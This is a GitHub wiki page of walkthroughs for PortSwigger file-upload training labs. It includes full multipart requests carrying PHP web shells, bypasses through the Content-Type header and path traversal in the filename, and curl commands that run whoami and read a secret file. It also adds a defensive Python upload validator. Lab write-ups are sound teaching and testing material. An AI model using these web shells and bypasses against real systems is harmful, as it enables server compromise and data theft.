File upload vulnerabilities - gachikuku/portswigger GitHub Wiki

Apprentice lab:
Remote code execution via web shell upload

This lab contains a vulnerable image upload function. It doesn't perform any validation on the files users upload before storing them on the server's filesystem.
To solve the lab, upload a basic PHP web shell and use it to exfiltrate the contents of the file /home/carlos/secret. Submit this secret using the button provided in the lab banner.
You can log in to your own account using the following credentials: wiener:peter

  • Solution

    1. Log in as wiener:peter.
    2. Upload a sample image (ideally a 1px image).
    3. Locate the uploaded file (i.e. files/avatars/image.png).
    4. Analyse the POST request that uploaded the file and the GET request that fetches the image.
    5. Change the POST request and confirm the change is reflected in the GET response.
    6. Read the secret and submit it.

Apprentice lab:
Web shell upload via Content-Type restriction bypass

This lab contains a vulnerable image upload function. It attempts to prevent users from uploading unexpected file types, but relies on checking user-controllable input to verify this.
To solve the lab, upload a basic PHP web shell and use it to exfiltrate the contents of the file /home/carlos/secret. Submit this secret using the button provided in the lab banner.
You can log in to your own account using the following credentials: wiener:peter

  • Solution

    1. Log in as wiener:peter.
    2. Upload a sample image (ideally a 1px image).
    3. Locate the uploaded file (i.e. files/avatars/image.png).
    4. Analyse the POST request that uploaded the file and the GET request that fetches the image.
    5. Duplicate the POST /my-account/avatar request.
    6. On the duplicated POST request, press ea to open and edit the request body.
    7. Edit the multipart request body as follows (only the Content-Type line changes):
        -----------------------------110021003736074269862781810296
        Content-Disposition: form-data; name="avatar"; filename="exploit.php"
      - Content-Type: text/plain
      + Content-Type: image/png
      
        <?php echo file_get_contents('/home/carlos/secret'); ?>
        -----------------------------110021003736074269862781810296
        Content-Disposition: form-data; name="user"
      
        wiener
        -----------------------------110021003736074269862781810296
        Content-Disposition: form-data; name="csrf"
      
        XdvzQpIziILt34TaP4GY1nLyFeFXhMhR
        -----------------------------110021003736074269862781810296--
    8. Visit /files/avatars/exploit.php.

Practitioner lab:
Web shell upload via path traversal

This lab contains a vulnerable image upload function. The server is configured to prevent execution of user-supplied files, but this restriction can be bypassed by exploiting a secondary vulnerability.
To solve the lab, upload a basic PHP web shell and use it to exfiltrate the contents of the file /home/carlos/secret. Submit this secret using the button provided in the lab banner.
You can log in to your own account using the following credentials: wiener:peter

  • Solution

    1. Log in as wiener:peter.
    2. Upload a sample image.
    3. Right-click the uploaded image to find where it was stored: /files/avatars/image.png.
    4. Duplicate the POST request to upload a web shell, <?php system($_GET['cmd']); ?>.
    5. Press ea to open and edit the request body (only the filename changes):
        -----------------------------33535606952856614791034043163
      - Content-Disposition: form-data; name="avatar"; filename="image.php"
      + Content-Disposition: form-data; name="avatar"; filename="../image.php"
        Content-Type: image/png
      
        <?php system($_GET['cmd']); ?>
        -----------------------------33535606952856614791034043163
        Content-Disposition: form-data; name="user"
      
        wiener
        -----------------------------33535606952856614791034043163
        Content-Disposition: form-data; name="csrf"
      
        k6OY4oqfcG4TmjX5toKp6DmEgUiW8cBi
        -----------------------------33535606952856614791034043163--
    6. Notice that the GET request for the uploaded image endpoint does not reflect the change.
    7. Trying variations is encouraged: the URL-encoded form ..%2Fimage.php works!
    8. Verify that the web shell works with
      curl "https://uuid.web-security-academy.net/files/avatars/../image.php?cmd=whoami"
    9. Exfiltrate the flag with cmd=cat%20/home/carlos/secret.
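As a defensive counterpart to the two bypasses walked through above (the client-controlled Content-Type header, and the path traversal in the filename including its URL-encoded ..%2F form), the following Python is an added example written for this page, not code from the lab or the wiki. It validates an avatar upload by magic bytes instead of the declared Content-Type, rejects any filename that carries a path component before it is used, and stores the file under a server-chosen name; the MAGIC table and the sample cases are constructed.

```python
import logging
import secrets
from urllib.parse import unquote

log = logging.getLogger("upload")

# Allowed extensions and the magic bytes a file with that extension must start with.
# Constructed for this example; extend to the image types the application serves.
MAGIC = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
}

def check_upload(filename: str, content_type: str, data: bytes) -> tuple:
    """Validate an avatar upload server-side.

    Returns (True, server_chosen_name) or (False, rejection_reason).
    The declared Content-Type is only logged: it is client-controlled, so
    setting it to image/png must never make a PHP file acceptable.
    The client filename contributes nothing but an extension; anything that
    looks like a path, including URL-encoded ..%2F, is rejected before use.
    """
    decoded = filename
    for _ in range(3):  # collapse ..%2F and double-encoded ..%252F to ../
        decoded = unquote(decoded)
    if any(ch in decoded for ch in "/\\\x00") or ".." in decoded:
        return False, "path or control characters in filename"
    if "." not in decoded:
        return False, "no extension"
    ext = decoded.rsplit(".", 1)[1].lower()
    if ext not in MAGIC:
        return False, f"extension .{ext} not allowed"
    if not any(data.startswith(sig) for sig in MAGIC[ext]):
        return False, "content does not match the claimed image type"
    if content_type != "image/" + ("jpeg" if ext == "jpg" else ext):
        log.warning("declared %s for .%s upload; header ignored", content_type, ext)
    # Random server-chosen name: no client-supplied text ever reaches the filesystem.
    return True, f"{secrets.token_hex(16)}.{ext}"

if __name__ == "__main__":
    php = b"<?php system($_GET['cmd']); ?>"           # constructed sample body
    for case in [
        ("exploit.php", "image/png", php),            # Content-Type bypass attempt
        ("../image.php", "image/png", php),           # path traversal in filename
        ("..%2Fimage.php", "image/png", php),         # URL-encoded traversal
        ("image.png", "image/png", MAGIC["png"][0] + b"\x00" * 16),
    ]:
        print(case[0], "->", check_upload(*case))
```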

Practitioner lab:
